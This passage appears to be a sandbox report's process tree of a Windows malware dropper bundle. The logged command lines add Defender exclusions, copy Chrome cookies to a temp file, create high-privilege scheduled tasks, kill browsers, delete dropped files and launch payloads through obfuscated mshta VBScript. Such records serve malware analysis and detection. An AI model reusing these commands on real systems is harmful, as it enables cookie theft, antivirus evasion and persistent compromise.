C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:3664
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Gbj64GgjHOmgsLq9f2vD2Def.exe"C:\Users\Admin\Pictures\Adobe Films\Gbj64GgjHOmgsLq9f2vD2Def.exe"6⤵PID:5588
-
-
C:\Users\Admin\Pictures\Adobe Films\eeUsra3KO3F8pRjymnsB0nXP.exe"C:\Users\Admin\Pictures\Adobe Films\eeUsra3KO3F8pRjymnsB0nXP.exe"6⤵PID:5708
-
-
C:\Users\Admin\Pictures\Adobe Films\y6BrMPmK5ph61VVOpJvALchW.exe"C:\Users\Admin\Pictures\Adobe Films\y6BrMPmK5ph61VVOpJvALchW.exe"6⤵PID:5348
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵PID:5260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵PID:6180
-
-
-
C:\Users\Admin\Pictures\Adobe Films\sqwQeI1eYHHnuOLtHzZ2ML0_.exe"C:\Users\Admin\Pictures\Adobe Films\sqwQeI1eYHHnuOLtHzZ2ML0_.exe"6⤵PID:5812
-
-
C:\Users\Admin\Pictures\Adobe Films\fK9g8eZ9t6yVzxfwet1amDUU.exe"C:\Users\Admin\Pictures\Adobe Films\fK9g8eZ9t6yVzxfwet1amDUU.exe"6⤵PID:5880
-
-
C:\Users\Admin\Pictures\Adobe Films\2E100bKotanh9fLG2KBQfsFN.exe"C:\Users\Admin\Pictures\Adobe Films\2E100bKotanh9fLG2KBQfsFN.exe"6⤵PID:5932
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵PID:4192
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
PID:4948
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\HjLCibFOi2YJXX4_J1Ao_Lnc.exe"C:\Users\Admin\Pictures\Adobe Films\HjLCibFOi2YJXX4_J1Ao_Lnc.exe"6⤵PID:5872
-
-
C:\Users\Admin\Pictures\Adobe Films\1j_af0aQ1vhAfBBQxi9h3oZE.exe"C:\Users\Admin\Pictures\Adobe Films\1j_af0aQ1vhAfBBQxi9h3oZE.exe"6⤵PID:5144
-
-
C:\Users\Admin\Pictures\Adobe Films\CEzFZCZOex2S8chk5mYyOsMe.exe"C:\Users\Admin\Pictures\Adobe Films\CEzFZCZOex2S8chk5mYyOsMe.exe"6⤵PID:4788
-
-
C:\Users\Admin\Pictures\Adobe Films\3pyvDF5BcyhBADQASRHdE_kU.exe"C:\Users\Admin\Pictures\Adobe Films\3pyvDF5BcyhBADQASRHdE_kU.exe"6⤵PID:3576
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵PID:5740
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gJvKZNOeZzxVnAeqDvQvn9WO.exe"C:\Users\Admin\Pictures\Adobe Films\gJvKZNOeZzxVnAeqDvQvn9WO.exe"6⤵PID:3168
-
-
C:\Users\Admin\Pictures\Adobe Films\2DYQvtIh3ce8724on5V09oIc.exe"C:\Users\Admin\Pictures\Adobe Films\2DYQvtIh3ce8724on5V09oIc.exe"6⤵PID:740
-
-
C:\Users\Admin\Pictures\Adobe Films\Vkki9EWhRfFG3swXd2uwRJKl.exe"C:\Users\Admin\Pictures\Adobe Films\Vkki9EWhRfFG3swXd2uwRJKl.exe"6⤵PID:2220
-
-
C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"6⤵PID:1168
-
-
C:\Users\Admin\Pictures\Adobe Films\q7eIVhHVwNzS8Z03T3qBYNfn.exe"C:\Users\Admin\Pictures\Adobe Films\q7eIVhHVwNzS8Z03T3qBYNfn.exe"6⤵PID:644
-
-
C:\Users\Admin\Pictures\Adobe Films\nGGzH035fd28Rex9K2YjI1D8.exe"C:\Users\Admin\Pictures\Adobe Films\nGGzH035fd28Rex9K2YjI1D8.exe"6⤵PID:5048
-
-
C:\Users\Admin\Pictures\Adobe Films\6VKDl7znAfYnyGKVQb1ZkqIH.exe"C:\Users\Admin\Pictures\Adobe Films\6VKDl7znAfYnyGKVQb1ZkqIH.exe"6⤵PID:3248
-
C:\Users\Admin\Documents\uIrgCCwCkXNkltWaSsazxtRg.exe"C:\Users\Admin\Documents\uIrgCCwCkXNkltWaSsazxtRg.exe"7⤵PID:6148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:6200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:6192
-
-
-
C:\Users\Admin\Pictures\Adobe Films\i0K_H6Cs2RJCTWPiOUYD37pl.exe"C:\Users\Admin\Pictures\Adobe Films\i0K_H6Cs2RJCTWPiOUYD37pl.exe"6⤵PID:2400
-
-
C:\Users\Admin\Pictures\Adobe Films\vH3tKOl06Wfs5SENTRp7envA.exe"C:\Users\Admin\Pictures\Adobe Films\vH3tKOl06Wfs5SENTRp7envA.exe"6⤵PID:5720
-
-
C:\Users\Admin\Pictures\Adobe Films\kFJFPA7cj6Dr2QL7L7i0pE1P.exe"C:\Users\Admin\Pictures\Adobe Films\kFJFPA7cj6Dr2QL7L7i0pE1P.exe"6⤵PID:2512
-
-
C:\Users\Admin\Pictures\Adobe Films\yCEgBJRApotvw9FnwRTSEAcH.exe"C:\Users\Admin\Pictures\Adobe Films\yCEgBJRApotvw9FnwRTSEAcH.exe"6⤵PID:3988
-
C:\Users\Admin\Pictures\Adobe Films\yCEgBJRApotvw9FnwRTSEAcH.exe"C:\Users\Admin\Pictures\Adobe Films\yCEgBJRApotvw9FnwRTSEAcH.exe" -u7⤵PID:920
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rbywTHqSWbLrOQInar2AKrbZ.exe"C:\Users\Admin\Pictures\Adobe Films\rbywTHqSWbLrOQInar2AKrbZ.exe"6⤵PID:1320
-
C:\Users\Admin\Pictures\Adobe Films\rbywTHqSWbLrOQInar2AKrbZ.exe"C:\Users\Admin\Pictures\Adobe Films\rbywTHqSWbLrOQInar2AKrbZ.exe" -u7⤵PID:2092
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun108e4051ef0.exe4⤵
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun108e4051ef0.exeSun108e4051ef0.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10d73b7785b.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10d73b7785b.exeSun10d73b7785b.exe5⤵
- Executes dropped EXE
PID:628 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Sun10d73b7785b.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10d73b7785b.exe" & del C:\ProgramData\*.dll & exit6⤵PID:4600
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Sun10d73b7785b.exe /f7⤵
- Kills process with taskkill
PID:4752
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1074b86ebb831862.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1074b86ebb831862.exeSun1074b86ebb831862.exe5⤵
- Executes dropped EXE
PID:3700
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" .\2c3M8M5c.RJ6⤵PID:3052
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\2c3M8M5c.RJ7⤵
- Loads dropped DLL
PID:1064
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\2c3M8M5c.RJ8⤵PID:5992
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\2c3M8M5c.RJ9⤵PID:2456
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1050791613c996ff.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4080
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10aa9ae1c57b995f.exe4⤵PID:3376
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10aa9ae1c57b995f.exeSun10aa9ae1c57b995f.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1516
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10aa9ae1c57b995f.exeC:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10aa9ae1c57b995f.exe6⤵
- Executes dropped EXE
PID:4104
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10df2d13b8e171d6f.exe4⤵PID:1088
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10df2d13b8e171d6f.exeSun10df2d13b8e171d6f.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2096
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:4924
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:4396
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10ee0af6c65e215a.exe4⤵PID:2364
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10ee0af6c65e215a.exeSun10ee0af6c65e215a.exe5⤵
- Executes dropped EXE
PID:2456
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun106a84a94b0.exe4⤵PID:1636
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun106a84a94b0.exeSun106a84a94b0.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1608
C:\Users\Admin\AppData\Local\c0a2c849-5063-4935-ab6d-e64215a5a417.exe"C:\Users\Admin\AppData\Local\c0a2c849-5063-4935-ab6d-e64215a5a417.exe"6⤵
- Executes dropped EXE
PID:1812
C:\Users\Admin\AppData\Local\d447a67e-39e8-4f6a-a12a-e9f5d8a8ff8d.exe"C:\Users\Admin\AppData\Local\d447a67e-39e8-4f6a-a12a-e9f5d8a8ff8d.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2932
C:\Users\Admin\AppData\Roaming\31062152\4742347347423473.exe"C:\Users\Admin\AppData\Roaming\31062152\4742347347423473.exe"7⤵
- Executes dropped EXE
PID:4912
C:\Users\Admin\AppData\Local\f67369eb-64f2-4d2e-af91-189ade5f689a.exe"C:\Users\Admin\AppData\Local\f67369eb-64f2-4d2e-af91-189ade5f689a.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4288
C:\Users\Admin\AppData\Local\99bc6450-4f49-4a6d-b27a-543ddf1db221.exe"C:\Users\Admin\AppData\Local\99bc6450-4f49-4a6d-b27a-543ddf1db221.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4416
C:\Users\Admin\AppData\Local\927c01de-e6a5-4887-8d30-8616657f8e14.exe"C:\Users\Admin\AppData\Local\927c01de-e6a5-4887-8d30-8616657f8e14.exe"6⤵
- Executes dropped EXE
PID:4500
C:\Users\Admin\AppData\Roaming\2480812.exe"C:\Users\Admin\AppData\Roaming\2480812.exe"7⤵PID:1308
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",8⤵PID:1884
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",9⤵PID:4856
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",10⤵PID:4984
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",11⤵PID:4380
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10fe8cb62035134.exe4⤵PID:1668
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fe8cb62035134.exeSun10fe8cb62035134.exe5⤵
- Executes dropped EXE
PID:2424
C:\Users\Admin\AppData\Local\Temp\is-6P3VE.tmp\Sun10fe8cb62035134.tmp"C:\Users\Admin\AppData\Local\Temp\is-6P3VE.tmp\Sun10fe8cb62035134.tmp" /SL5="$101F6,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fe8cb62035134.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1208
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fe8cb62035134.exe"C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fe8cb62035134.exe" /SILENT7⤵
- Executes dropped EXE
PID:3304
C:\Users\Admin\AppData\Local\Temp\is-ARV1T.tmp\Sun10fe8cb62035134.tmp"C:\Users\Admin\AppData\Local\Temp\is-ARV1T.tmp\Sun10fe8cb62035134.tmp" /SL5="$1020C,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fe8cb62035134.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:1348
C:\Users\Admin\AppData\Local\Temp\is-GC57M.tmp\windllhost.exe"C:\Users\Admin\AppData\Local\Temp\is-GC57M.tmp\windllhost.exe" 779⤵
- Executes dropped EXE
PID:4308
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10de08ca9cb.exe4⤵PID:1452
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10de08ca9cb.exeSun10de08ca9cb.exe5⤵
- Executes dropped EXE
PID:3456
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" .\2c3M8M5c.RJ6⤵PID:1344
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\2c3M8M5c.RJ7⤵
- Loads dropped DLL
PID:1268
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\2c3M8M5c.RJ8⤵PID:5312
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\2c3M8M5c.RJ9⤵PID:4076
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10f51ad6615.exe4⤵PID:1332
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10f51ad6615.exeSun10f51ad6615.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2240
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10f51ad6615.exeC:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10f51ad6615.exe6⤵
- Executes dropped EXE
PID:4116
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10f1b87ddac.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1268
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10fd677cdc.exe4⤵PID:1440
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fd677cdc.exeSun10fd677cdc.exe5⤵
- Executes dropped EXE
PID:3488
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:1392
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:4656
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1084932dd6b.exe /mixtwo4⤵PID:3612
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1084932dd6b.exeSun1084932dd6b.exe /mixtwo5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1844
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1050791613c996ff.exeSun1050791613c996ff.exe1⤵
- Executes dropped EXE
PID:2916
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1050791613c996ff.exe"C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1050791613c996ff.exe" -u2⤵
- Executes dropped EXE
PID:2208
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10f1b87ddac.exeSun10f1b87ddac.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1256
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1084932dd6b.exeSun1084932dd6b.exe /mixtwo1⤵
- Executes dropped EXE
PID:3932
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun1084932dd6b.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1084932dd6b.exe" & exit2⤵PID:4472
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun1084932dd6b.exe" /f3⤵
- Kills process with taskkill
PID:4348
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1448
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5116
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4356
C:\Program Files (x86)\Company\NewProduct\OneCleanerInst931928.exe"C:\Program Files (x86)\Company\NewProduct\OneCleanerInst931928.exe"1⤵PID:5980
C:\Users\Admin\AppData\Local\8614b2dc-fb94-41df-8f04-2badc1c6dd31.exe"C:\Users\Admin\AppData\Local\8614b2dc-fb94-41df-8f04-2badc1c6dd31.exe"2⤵PID:5756
C:\Users\Admin\AppData\Local\6b0c8fb6-e9d8-4393-90f8-9013c368aca8.exe"C:\Users\Admin\AppData\Local\6b0c8fb6-e9d8-4393-90f8-9013c368aca8.exe"2⤵PID:6164
C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"1⤵PID:5972
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:3796
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: cLose (CREatEObJECT ("wSCripT.sHeLl" ).Run ("C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """"== """" for %e In (""C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"" ) do taskkill /iM ""%~Nxe"" -f ",0 , TrUe ) )1⤵PID:5956
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /r TyPE "C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"> ..\ZCJQBxDe1bLl.exE &&staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If ""== "" for %e In ("C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe" ) do taskkill /iM "%~Nxe" -f2⤵PID:4588
C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe3⤵PID:5572
C:\Windows\SysWOW64\taskkill.exetaskkill /iM "m3GJY76KHkrUvSQv6yEtaHM4.exe" -f3⤵
- Kills process with taskkill
PID:2284
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"1⤵PID:5944